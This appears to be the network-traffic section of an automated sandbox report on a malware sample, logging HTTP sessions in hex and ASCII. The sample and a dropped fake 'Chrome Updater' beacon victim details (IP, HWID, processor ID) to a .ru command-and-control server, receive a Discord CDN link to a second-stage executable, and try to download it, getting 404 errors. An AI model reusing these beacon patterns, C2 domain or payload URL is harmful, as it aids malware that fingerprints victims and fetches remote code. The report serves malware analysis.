                                                                                    2024-01-04 07:31:32 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    205192.168.2.649930104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:31 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:32 UTC572INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V2UVIhokVaUu3OgmjTSIsJFigZKkeoaH8wDy98ed6yZLzlUGfbxIzZ3E1cdAOWoEKEGiubxxin2s1lOjeLJB%2FdoOfsAfDV39XG0Kl5Ztf70g72nJA5QEOAWd0Vb36Tjc1cya5tWY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c84cfeea0784-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:32 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    206192.168.2.649931162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:32 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:32 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:32 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c84feac420d0-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 74
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:32 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=3LPMfZdWUSk_1L.pdfKbMj03zmcWFl1fxS7ZDznEHgA-1704353492-1-AbOl23tgYnwgUUhzq9qUvn7VBvyZzwxlCkR8mxenn06naIyft8ZKaV86BnAgwfwf690n9/F+JDE9xy9+6xl5FG8=; path=/; expires=Thu, 04-Jan-24 08:01:32 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bv8apLk%2FSDtRdANUTeDW02I0w8%2FqFD3%2Fhe9D9HkzdDPgxGPI2P6PQYFkBwK5Bn6HTFoL101ETXdQt6IkLGV4CA5ADrHHHhLBs6sc0SUJ94C6jnVR4LZvuk5yocnhDbHnjpSHfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=5n03gCYW4PeT3zoNtQqBqVEN4MFGo_UzqBwzmd3IQCA-1704353492497-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:32 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
                                                                                    2024-01-04 07:31:32 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    207192.168.2.649932104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:32 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:32 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S7NdJsOZyM85veaXCof2%2BC%2F7jXHiu91JeJonT4uW7fvOYkXZsG6VIjFUGNhpox9ZTCAtrjEFzzQKsibYebCfWGzfc1ZZDMvgLzh1fwWM03AaQW7bx5WGs8xxqqsh1137bIvNaZ76"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8514c6859af-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:32 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    208192.168.2.649933104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:32 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:33 UTC582INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r%2BA4X8soAWv5jpwf1e28eVoRy87mT4Ax%2BcLe4Joi0Xupvk7WBKGL1r9Q2hnSYYDIW4nhVEQK6ak6pkGi9Q2sRW7GzXv%2FZW3ZLqAA2N%2Bt%2BGvY4LBjROAqnKdNTRQcb9%2BPf6wO41cW"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8538d268011-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:33 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    209192.168.2.649934162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:33 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:33 UTC1335INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:33 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c85579870806-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 68
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:33 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=KbWlNpyYQ9xx1RszwGm680baLsMFIu1_iGI9tOHazyQ-1704353493-1-ATfoADCVbK6CGX6mr61gTYmXuNP9JK7NU9tdBtfbDujc6yKTAxvbA0m/GEGSgvXDoEjVj8x7b5dsRXM2ikhCS00=; path=/; expires=Thu, 04-Jan-24 08:01:33 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UNgVHix6D62XLzgHnNB8LLQdAbVhUNI5sptqZ0k%2FdS8Co2NtwC8GLcZOLHdz2QrCE%2FJr6LhMDfn%2FzLs47dO22z22Nw%2Fts4gtuxpzvX9s1RrbobKKuivza16JAAgqgvRn4wUm5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=ZIjXqFqQlPfPzow4xaOO2HzJnvPnHkR1hZHpv8rjvjo-1704353493377-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:33 UTC34INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-
                                                                                    2024-01-04 07:31:33 UTC202INData Raw: 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    210192.168.2.649935104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:33 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:34 UTC593INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dcpUCUPuhENGI57HqGLIYpdIn9HqLTtyGBydN7t0FhurI09FKJrPR85xP3Pd2vzd6WiErLgIjrYkPTxtUHWnBUTd1kdALal0etSu0YqpbPwwijlpmDN2yuzNXf1PfOBfPFY2ine2"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8580e09177d-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:34 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    211192.168.2.649936104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:33 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:34 UTC574INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4IBajy8qCf8ExBL6pVixNFPkIa3vs3FwZYl%2BFZxu93M814Zgsm2aVK0loeW%2BYs8JPas8WsHumkOAWbBukXO00BsPmdRkKFEy6MHkZxv64fDfPQ2maPNe5zyy9rpJBffGMdJbK4u"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8591a5a28ba-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:34 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    212192.168.2.649937162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:34 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:34 UTC1331INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:34 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c85e0f6e38fd-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 69
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:34 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=gfMOXTTPwSwTdrB7zcIkie04uIqifEU46VI8o0Tq5W4-1704353494-1-ASXYFjd2bkR3w9kQs25q9d7Wn85LBBu0eIzOGL4Z9dZ02O3VgaLLx4Ktkn+vriKkCpMJsKr/RhqW0b4yiN6cbW0=; path=/; expires=Thu, 04-Jan-24 08:01:34 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4wKTvVqVoVdihbZRLshB5eNrRqPnYC6GLSJzx1577TZHRm2uKnlBFEIoRXYK7VTZloclvcIJ%2BJxq2XzGqK2VEXHyykHoE3bQ7OPhmH3kZ7YxjiQVTMItS8PuU0wDQuf%2FvtL21Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=ciCUi0l9EtyzLQYUCD63xQWeNWODvUNDs.gWQTbRGkI-1704353494752-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:34 UTC38INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?>
                                                                                    2024-01-04 07:31:34 UTC198INData Raw: 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    213192.168.2.649938104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:34 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:35 UTC607INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mrp7ouSrSI95Ma%2BABHU4UCKFDZ8ApwahAz%2BtIUG%2FBLVYUh0vUHdKs%2Bz2Fo2A7bdR0B%2B8sVRS55XtpMns0kQ4OO5hXx0qKQHivElcTib5bFzKqSYHM7LAr5F0Nu1z%2B%2FRMh0hlGHj3"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c85eaeb85a21-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:35 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    214192.168.2.649939104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:35 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:35 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8Mp6zqIEu1WYIw56S1YCR4xfA69W%2B1DESOSp53RXEakSvscwh6yW2JedEQkb4PT9we5BudUi2N1%2BTjbHOZV8OiT7ANzfVSgCUmZ4gHmlcFGIP9Ssj%2F1Y%2FChNt55OQBkUDoPK%2FULP"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8618b8d6f9e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:35 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    215192.168.2.649940162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:35 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:35 UTC1346INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:35 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c86409149c67-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 57
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:35 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=QppWmFXb0v0hJX0gqyrJg8kyPH2S7Pv7.3OhL1WtaLc-1704353495-1-AcrdLCRxnpuPJRUqu6MH0sbnv60innB/MAhWKFfNyDXD/8SiT8E93aX2ByajFhD/DRrE8zFlKo6QzhBHul0Gneg=; path=/; expires=Thu, 04-Jan-24 08:01:35 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=idjmVLyWhxZZXZ%2BpL2GRhxU8mQ903eiM%2B6E7ZxDMbpog07nMZPWSmF%2BaM%2FfzTS6sXrhqQYu5XocowBeNBdaVjg38vAGPm2nDj0ARMsgbRr%2BxzlDmzg32gUA0GyLmDSK5eD8%2BTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=bcYh6jZcMXBUGT4LgJK2BNPBkXJYOrv3uWDeHGkuysw-1704353495719-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:35 UTC23INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63
                                                                                    Data Ascii: <?xml version='1.0' enc
